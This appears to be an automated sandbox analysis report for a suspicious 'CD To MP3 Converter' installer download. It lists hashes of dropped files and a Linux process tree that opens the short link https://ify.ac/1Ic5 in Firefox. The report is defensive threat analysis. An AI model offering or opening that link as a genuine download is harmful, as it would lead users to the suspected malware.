| SHA1 | 901cfea09bc88d26a55cf2c57ccdaf45dfaea95a |
| SHA256 | 587d5394ddb17dec6f39de2e973431f161a1e08a45d499fe7c7a6333a93904cd |
| SHA512 | 16855a943a768355129e31623e5eb7064741d4d07ac2c0fcd21c5742a1b2e2a2c3af38e0f481bd7b8006dc96c408be07b91bbbe28ce7c4f7f0f7d53e427500c9 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\502XJ358\QR5Eh00-DY-sP8PcJ5iIzhz00opxPFI30kmgY8y9GnU[1].js
| MD5 | 142ad35a28d4cfa91655c971bdcc8c21 |
| SHA1 | a2ebf958fffaf5dae9855080c6687e0127f51cc3 |
| SHA256 | 411e44874d3e0d8fac3fc3dc279888ce1cf4d28a713c5237d249a063ccbd1a75 |
| SHA512 | a1591f1b237541df648ace2fa8b22712fa2e930977004818ee20ea05757fc8bd54febb344dcdce6354ae9d6b7fc2f8d7eada88c05593cca56c3d85996ea0b089 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\7GPGADG0\webworker[1].js
| MD5 | f66834120faccb628f46eb0fc62f644c |
| SHA1 | 15406e8ea9c7c2e6ef5c775be244fe166933bfcb |
| SHA256 | 8f063ae681a530a407ea4d17859790d9e45fd81ce5b3bb6202fc9e30cef95996 |
| SHA512 | 7c596e61967fe787bc29d262c945d7eb4e02f9f574d3c8c664f333c9c3b4dd4aff1dfcde8f34be1acfaf8c05423c1c118a4bfd50684a7cd9f90e5f40fbc89653 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\90MKKRR5\setup_woMGQPOBj7[1].zip
| MD5 | 9c21e9c1f627e4715f24aad38f78d2ae |
| SHA1 | 5f612a24df8fd4fd0d867ba605bd34b29c6020e3 |
| SHA256 | e645f5c9d17da8bf1dd16e19db3cc44795aac3b52d7fd1791ddae1d940cbb129 |
| SHA512 | 611b1aa63f465bbd4b40c65e06d5c75736931c03fa16a539b86a29531e8e0831c37cf097ebbc4867909556f1afb42f544736b3541a8edb586539992489999878 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\BFW8BSZG\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\setup_woMGQPOBj7.zip.i2yvpnb.partial
| MD5 | f1cf45b7b61e00c6d4cb7e8adc122d36 |
| SHA1 | 218f555adc318775180e3528d2ed994d5244cb5f |
| SHA256 | f892fc1ad1e694e442a69b8a70ed5bd5901260af658c5ae1bdadbbaf3b549d52 |
| SHA512 | 08b777f3abdbe5089237620abd2812672b778a550f927c05fcdefded05beec993d02251060a2b1f4cf60493d3be606a4b702c61c3fc0123f9378c66a7e472a42 |
C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp
| MD5 | 4b0524fa48ddc6b8d8191ef7a213b2e6 |
| SHA1 | d05ecb09aadbde153ad37c67db8b0206efa1fd37 |
| SHA256 | 43af110947449a12b150169d107ff3d7cd103801e5dadf6485cdc719e185bde6 |
| SHA512 | 4d29764c488281586dbcdb5eeb10a8924ab689ddc839b08b779c98e26eec8460aac531b156eafb937192bce486bee89bc117e47aa1ae4d7045ff72ff813d78bf |
\Users\Admin\AppData\Local\Temp\is-KATFL.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
| MD5 | 7f2c34b6c0c8680f35a234077c40ee51 |
| SHA1 | e83cd07646f25afccda2ff63f7035d147268b264 |
| SHA256 | a8d33c8ae6df133bebbaebc079225aa6662cad3413a36feefe29c1ac6e3ce474 |
| SHA512 | 8633680cd10b6ba33831c3962dceecef234b16b328c6f32dd1146a89b42738bdb02e91c1ebe2799e1a4f578050ee1d32b36cbcc92c0b26f0a28d59613a60014f |
memory/4908-2311-0x0000000000400000-0x0000000000D15000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\3WNUAE56\website_icon[1].svg
| MD5 | 02f7553e1ac3129cd1c4d0442b5a0f81 |
| SHA1 | 0dd8634450681fe1a2d0c1e5b02d6d0954e2772d |
| SHA256 | 0019255c610cb0843c524d7995905fa5201651fcc393846bee8414f0610097f5 |
| SHA512 | ac141a5648a3a22ceb295de8ecc6823f53d2a453316cd591dde888715344a60694316e1b85a5ceec72af62e34cc3d01768b020e5dfd5e0cb9916ec975ba4318e |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\BFW8BSZG\favicon-32x32[1].png
| MD5 | 16a75c7824b5223b8e22864354e9e33f |
| SHA1 | 2c35e76ebe2d8002369d582b32bd70374552c574 |
| SHA256 | 7f3e38478d53875c1f35d67fc035067274bacf9df8285889ad04fb143dfdddd8 |
| SHA512 | bd09744894646081e02b9e730c68c82354e3907c419578bdcb45d52c99d909d78ee084c8948b99d14ac6c8dfb343c9eb9197af039c5ac99d356440efd10a4ee8 |
memory/4908-2487-0x0000000000400000-0x0000000000D15000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-14 17:56
Reported
2024-07-14 18:01
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
258s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | pool-spawner | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gmain | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | dconf worker | N/A | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/kernel/security/apparmor/features/namespaces | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/io_uring | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/mount | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/network | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/ptrace | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/signal | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/caps | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/file | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/rlimit | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/lib/snapd/snap-seccomp | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/dbus | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/domain | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/network_v8 | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/ipc | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/policy | /snap/bin/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/query | /snap/bin/firefox | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/gsettings | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/sys/kernel/random/uuid | /snap/bin/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/mounts | /snap/bin/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/mountinfo | /snap/bin/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/gsettings | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/cgroups | /snap/bin/firefox | N/A |
| File opened for reading | /proc/cmdline | /snap/bin/firefox | N/A |
| File opened for reading | /proc/2396/cgroup | /snap/bin/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/gsettings | N/A |
| File opened for reading | /proc/sys/kernel/seccomp/actions_avail | /snap/bin/firefox | N/A |
Processes
/usr/bin/xdg-open
[xdg-open https://ify.ac/1Ic5]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/grep
[grep -q ^file://]
/usr/bin/egrep
[egrep -q ^[[:alpha:]+\.\-]+:]
/usr/local/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/local/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/sed
[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/https]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/grep
[grep -l x-scheme-handler/https; /.local/share/applications/*.desktop]
/usr/bin/grep
[grep -l x-scheme-handler/https; /usr/local/share//applications/*.desktop]
/usr/bin/grep
[grep -l x-scheme-handler/https; /usr/share//applications/apport-gtk.desktop /usr/share//applications/bluetooth-sendto.desktop /usr/share//applications/display-im6.q16.desktop /usr/share//applications/gcr-prompter.desktop /usr/share//applications/gcr-viewer.desktop /usr/share//applications/geoclue-demo-agent.desktop /usr/share//applications/gkbd-keyboard-display.desktop /usr/share//applications/gnome-about-panel.desktop /usr/share//applications/gnome-applications-panel.desktop /usr/share//applications/gnome-background-panel.desktop /usr/share//applications/gnome-bluetooth-panel.desktop /usr/share//applications/gnome-color-panel.desktop /usr/share//applications/gnome-datetime-panel.desktop /usr/share//applications/gnome-disk-image-mounter.desktop /usr/share//applications/gnome-disk-image-writer.desktop /usr/share//applications/gnome-display-panel.desktop /usr/share//applications/gnome-initial-setup.desktop /usr/share//applications/gnome-keyboard-panel.desktop /usr/share//applications/gnome-language-selector.desktop /usr/share//applications/gnome-mouse-panel.desktop /usr/share//applications/gnome-multitasking-panel.desktop /usr/share//applications/gnome-network-panel.desktop /usr/share//applications/gnome-notifications-panel.desktop /usr/share//applications/gnome-online-accounts-panel.desktop /usr/share//applications/gnome-power-panel.desktop /usr/share//applications/gnome-printers-panel.desktop /usr/share//applications/gnome-privacy-panel.desktop /usr/share//applications/gnome-region-panel.desktop /usr/share//applications/gnome-search-panel.desktop /usr/share//applications/gnome-session-properties.desktop /usr/share//applications/gnome-sharing-panel.desktop /usr/share//applications/gnome-sound-panel.desktop /usr/share//applications/gnome-system-monitor-kde.desktop /usr/share//applications/gnome-system-panel.desktop /usr/share//applications/gnome-ubuntu-panel.desktop /usr/share//applications/gnome-universal-access-panel.desktop /usr/share//applications/gnome-users-panel.desktop /usr/share//applications/gnome-wacom-panel.desktop /usr/share//applications/gnome-wifi-panel.desktop /usr/share//applications/gnome-wwan-panel.desktop /usr/share//applications/hplj1020.desktop /usr/share//applications/ibus-setup-table.desktop /usr/share//applications/im-config.desktop /usr/share//applications/io.snapcraft.SessionAgent.desktop /usr/share//applications/libreoffice-calc.desktop /usr/share//applications/libreoffice-draw.desktop /usr/share//applications/libreoffice-impress.desktop /usr/share//applications/libreoffice-math.desktop /usr/share//applications/libreoffice-startcenter.desktop /usr/share//applications/libreoffice-writer.desktop /usr/share//applications/libreoffice-xsltfilter.desktop /usr/share//applications/nautilus-autorun-software.desktop /usr/share//applications/nm-applet.desktop /usr/share//applications/nm-connection-editor.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Emojier.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Extension.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Wayland.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Setup.desktop /usr/share//applications/org.freedesktop.Xwayland.desktop /usr/share//applications/org.gnome.Calculator.desktop /usr/share//applications/org.gnome.Calendar.desktop /usr/share//applications/org.gnome.Characters.desktop /usr/share//applications/org.gnome.DejaDup.desktop /usr/share//applications/org.gnome.DiskUtility.desktop /usr/share//applications/org.gnome.Evince-previewer.desktop /usr/share//applications/org.gnome.Evince.desktop /usr/share//applications/org.gnome.Evolution-alarm-notify.desktop /usr/share//applications/org.gnome.FileRoller.desktop /usr/share//applications/org.gnome.Logs.desktop /usr/share//applications/org.gnome.Nautilus.desktop /usr/share//applications/org.gnome.OnlineAccounts.OAuth2.desktop /usr/share//applications/org.gnome.PowerStats.desktop /usr/share//applications/org.gnome.RemoteDesktop.Handover.desktop /usr/share//applications/org.gnome.Rhythmbox3.desktop /usr/share//applications/org.gnome.Rhythmbox3.device.desktop /usr/share//applications/org.gnome.Settings.desktop /usr/share//applications/org.gnome.Shell.Extensions.desktop /usr/share//applications/org.gnome.Shell.PortalHelper.desktop /usr/share//applications/org.gnome.Shell.desktop /usr/share//applications/org.gnome.Shotwell-Viewer.desktop /usr/share//applications/org.gnome.Shotwell.Auth.desktop /usr/share//applications/org.gnome.Shotwell.desktop /usr/share//applications/org.gnome.Snapshot.desktop /usr/share//applications/org.gnome.SystemMonitor.desktop /usr/share//applications/org.gnome.Tecla.desktop /usr/share//applications/org.gnome.Terminal.Preferences.desktop /usr/share//applications/org.gnome.Terminal.desktop /usr/share//applications/org.gnome.TextEditor.desktop /usr/share//applications/org.gnome.Totem.desktop /usr/share//applications/org.gnome.Zenity.desktop /usr/share//applications/org.gnome.baobab.desktop /usr/share//applications/org.gnome.clocks.desktop /usr/share//applications/org.gnome.eog.desktop /usr/share//applications/org.gnome.evolution-data-server.OAuth2-handler.desktop /usr/share//applications/org.gnome.font-viewer.desktop /usr/share//applications/org.gnome.seahorse.Application.desktop /usr/share//applications/org.remmina.Remmina-file.desktop /usr/share//applications/org.remmina.Remmina.desktop /usr/share//applications/python3.12.desktop /usr/share//applications/remmina-gnome.desktop /usr/share//applications/rygel.desktop /usr/share//applications/simple-scan.desktop /usr/share//applications/snap-handle-link.desktop /usr/share//applications/software-properties-drivers.desktop /usr/share//applications/software-properties-gtk.desktop /usr/share//applications/software-properties-livepatch.desktop /usr/share//applications/thunderbird.desktop /usr/share//applications/transmission-gtk.desktop /usr/share//applications/update-manager.desktop /usr/share//applications/usb-creator-gtk.desktop /usr/share//applications/xdg-desktop-portal-gnome.desktop /usr/share//applications/xdg-desktop-portal-gtk.desktop /usr/share//applications/yelp.desktop]
/usr/bin/grep
[grep -q %s]
/usr/bin/x-www-browser
[x-www-browser https://ify.ac/1Ic5]
/usr/bin/xdg-settings
[xdg-settings get default-web-browser]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/http]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/grep
[grep x-scheme-handler/http= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/grep
[grep -l x-scheme-handler/http; /.local/share/applications/*.desktop]
/usr/bin/grep
[grep -l x-scheme-handler/http; /usr/local/share//applications/*.desktop]
/usr/bin/grep
[grep -l x-scheme-handler/http; /usr/share//applications/apport-gtk.desktop /usr/share//applications/bluetooth-sendto.desktop /usr/share//applications/display-im6.q16.desktop /usr/share//applications/gcr-prompter.desktop /usr/share//applications/gcr-viewer.desktop /usr/share//applications/geoclue-demo-agent.desktop /usr/share//applications/gkbd-keyboard-display.desktop /usr/share//applications/gnome-about-panel.desktop /usr/share//applications/gnome-applications-panel.desktop /usr/share//applications/gnome-background-panel.desktop /usr/share//applications/gnome-bluetooth-panel.desktop /usr/share//applications/gnome-color-panel.desktop /usr/share//applications/gnome-datetime-panel.desktop /usr/share//applications/gnome-disk-image-mounter.desktop /usr/share//applications/gnome-disk-image-writer.desktop /usr/share//applications/gnome-display-panel.desktop /usr/share//applications/gnome-initial-setup.desktop /usr/share//applications/gnome-keyboard-panel.desktop /usr/share//applications/gnome-language-selector.desktop /usr/share//applications/gnome-mouse-panel.desktop /usr/share//applications/gnome-multitasking-panel.desktop /usr/share//applications/gnome-network-panel.desktop /usr/share//applications/gnome-notifications-panel.desktop /usr/share//applications/gnome-online-accounts-panel.desktop /usr/share//applications/gnome-power-panel.desktop /usr/share//applications/gnome-printers-panel.desktop /usr/share//applications/gnome-privacy-panel.desktop /usr/share//applications/gnome-region-panel.desktop /usr/share//applications/gnome-search-panel.desktop /usr/share//applications/gnome-session-properties.desktop /usr/share//applications/gnome-sharing-panel.desktop /usr/share//applications/gnome-sound-panel.desktop /usr/share//applications/gnome-system-monitor-kde.desktop /usr/share//applications/gnome-system-panel.desktop /usr/share//applications/gnome-ubuntu-panel.desktop /usr/share//applications/gnome-universal-access-panel.desktop /usr/share//applications/gnome-users-panel.desktop /usr/share//applications/gnome-wacom-panel.desktop /usr/share//applications/gnome-wifi-panel.desktop /usr/share//applications/gnome-wwan-panel.desktop /usr/share//applications/hplj1020.desktop /usr/share//applications/ibus-setup-table.desktop /usr/share//applications/im-config.desktop /usr/share//applications/io.snapcraft.SessionAgent.desktop /usr/share//applications/libreoffice-calc.desktop /usr/share//applications/libreoffice-draw.desktop /usr/share//applications/libreoffice-impress.desktop /usr/share//applications/libreoffice-math.desktop /usr/share//applications/libreoffice-startcenter.desktop /usr/share//applications/libreoffice-writer.desktop /usr/share//applications/libreoffice-xsltfilter.desktop /usr/share//applications/nautilus-autorun-software.desktop /usr/share//applications/nm-applet.desktop /usr/share//applications/nm-connection-editor.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Emojier.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Extension.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Wayland.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Setup.desktop /usr/share//applications/org.freedesktop.Xwayland.desktop /usr/share//applications/org.gnome.Calculator.desktop /usr/share//applications/org.gnome.Calendar.desktop /usr/share//applications/org.gnome.Characters.desktop /usr/share//applications/org.gnome.DejaDup.desktop /usr/share//applications/org.gnome.DiskUtility.desktop /usr/share//applications/org.gnome.Evince-previewer.desktop /usr/share//applications/org.gnome.Evince.desktop /usr/share//applications/org.gnome.Evolution-alarm-notify.desktop /usr/share//applications/org.gnome.FileRoller.desktop /usr/share//applications/org.gnome.Logs.desktop /usr/share//applications/org.gnome.Nautilus.desktop /usr/share//applications/org.gnome.OnlineAccounts.OAuth2.desktop /usr/share//applications/org.gnome.PowerStats.desktop /usr/share//applications/org.gnome.RemoteDesktop.Handover.desktop /usr/share//applications/org.gnome.Rhythmbox3.desktop /usr/share//applications/org.gnome.Rhythmbox3.device.desktop /usr/share//applications/org.gnome.Settings.desktop /usr/share//applications/org.gnome.Shell.Extensions.desktop /usr/share//applications/org.gnome.Shell.PortalHelper.desktop /usr/share//applications/org.gnome.Shell.desktop /usr/share//applications/org.gnome.Shotwell-Viewer.desktop /usr/share//applications/org.gnome.Shotwell.Auth.desktop /usr/share//applications/org.gnome.Shotwell.desktop /usr/share//applications/org.gnome.Snapshot.desktop /usr/share//applications/org.gnome.SystemMonitor.desktop /usr/share//applications/org.gnome.Tecla.desktop /usr/share//applications/org.gnome.Terminal.Preferences.desktop /usr/share//applications/org.gnome.Terminal.desktop /usr/share//applications/org.gnome.TextEditor.desktop /usr/share//applications/org.gnome.Totem.desktop /usr/share//applications/org.gnome.Zenity.desktop /usr/share//applications/org.gnome.baobab.desktop /usr/share//applications/org.gnome.clocks.desktop /usr/share//applications/org.gnome.eog.desktop /usr/share//applications/org.gnome.evolution-data-server.OAuth2-handler.desktop /usr/share//applications/org.gnome.font-viewer.desktop /usr/share//applications/org.gnome.seahorse.Application.desktop /usr/share//applications/org.remmina.Remmina-file.desktop /usr/share//applications/org.remmina.Remmina.desktop /usr/share//applications/python3.12.desktop /usr/share//applications/remmina-gnome.desktop /usr/share//applications/rygel.desktop /usr/share//applications/simple-scan.desktop /usr/share//applications/snap-handle-link.desktop /usr/share//applications/software-properties-drivers.desktop /usr/share//applications/software-properties-gtk.desktop /usr/share//applications/software-properties-livepatch.desktop /usr/share//applications/thunderbird.desktop /usr/share//applications/transmission-gtk.desktop /usr/share//applications/update-manager.desktop /usr/share//applications/usb-creator-gtk.desktop /usr/share//applications/xdg-desktop-portal-gnome.desktop /usr/share//applications/xdg-desktop-portal-gtk.desktop /usr/share//applications/yelp.desktop]
/usr/bin/gsettings
[gsettings get org.gnome.shell favorite-apps]
/usr/bin/grep
[grep -q 'firefox.desktop']
/usr/bin/gsettings
[gsettings get com.canonical.Unity.Launcher favorites]
/usr/bin/grep
[grep -q 'application://firefox.desktop']
/usr/bin/gsettings
[gsettings get org.mate.panel object-id-list]
/usr/bin/which
[which qdbus]
/snap/bin/firefox
[/snap/bin/firefox https://ify.ac/1Ic5]
/usr/lib/snapd/snap-seccomp
[/usr/lib/snapd/snap-seccomp version-info]
/usr/lib/snapd/snap-confine
[/usr/lib/snapd/snap-confine --base core22 snap.firefox.firefox /usr/lib/snapd/snap-exec firefox https://ify.ac/1Ic5]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | firefox.settings.services.mozilla.com | udp |
| US | 1.1.1.1:53 | firefox.settings.services.mozilla.com | udp |
| US | 1.1.1.1:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | r10.o.lencr.org | udp |
| US | 1.1.1.1:53 | r10.o.lencr.org | udp |
| GB | 104.86.111.145:80 | r10.o.lencr.org | tcp |
